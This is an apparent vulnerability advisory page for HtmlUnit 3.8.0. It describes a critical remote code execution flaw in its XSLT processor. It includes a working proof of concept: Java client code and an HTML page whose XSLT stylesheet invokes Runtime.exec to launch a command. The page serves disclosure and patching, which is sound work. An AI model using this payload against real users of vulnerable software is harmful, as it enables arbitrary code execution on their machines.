GHSA-37vq-hr2f-g7h7
Suggest an improvement- Source
- https://github.com/advisories/GHSA-37vq-hr2f-g7h7
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-37vq-hr2f-g7h7/GHSA-37vq-hr2f-g7h7.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-37vq-hr2f-g7h7
- Aliases
- Published
- 2023-12-04T23:13:30Z
- Modified
- 2024-02-16T08:22:32.307813Z
- Severity
-
- 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL
- Details
-
Summary
HtmlUnit 3.8.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage
Details
Vulnerability code location: org.htmlunit.activex.javascript.msxml.XSLProcessor#transform(org.htmlunit.activex.javascript.msxml.XMLDOMNode)
The reason for the vulnerability is that it was not enabled FEATURESECUREPROCESSING for the XSLT processor
PoC
pom.xml:
<dependency> <groupId>org.htmlunit</groupId> <artifactId>htmlunit</artifactId> <version>3.8.0</version> </dependency>code:
WebClient webClient = new WebClient(BrowserVersion.INTERNET_EXPLORER); HtmlPage page = webClient.getPage("http://127.0.0.1:8080/test.html"); System.out.println(page.asNormalizedText());test.html:
<script> var xslt = new ActiveXObject("Msxml2.XSLTemplate.6.0"); var xslDoc = new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0"); var xslProc; xslDoc.async = false; xslDoc.loadXML(`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <span><xsl:value-of select="$processString"/></span> </xsl:template> </xsl:stylesheet>`) if (xslDoc.parseError.errorCode != 0) { var myErr = xslDoc.parseError; document.write("ParseError: "+myErr.reason); } else { xslt.stylesheet = xslDoc; var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0"); xmlDoc.async = false; xmlDoc.loadXML("<s></s>"); if (xmlDoc.parseError.errorCode != 0) { var myErr = xmlDoc.parseError; document.write("Document error: " + myErr.reason); } else { xslProc = xslt.createProcessor(); xslProc.input = xmlDoc; xslProc.transform(); document.write(xslProc.output); } } </script>Impact
Remote Code Execution
- Database specific
{ "nvd_published_at": "2023-12-04T05:15:07Z", "cwe_ids": [ "CWE-94" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2023-12-04T23:13:30Z" }- References
Affected packages
Maven / org.htmlunit:htmlunit
Package
- Name
- org.htmlunit:htmlunit
- View open source insights on deps.dev
- Purl
- pkg:maven/org.htmlunit/htmlunit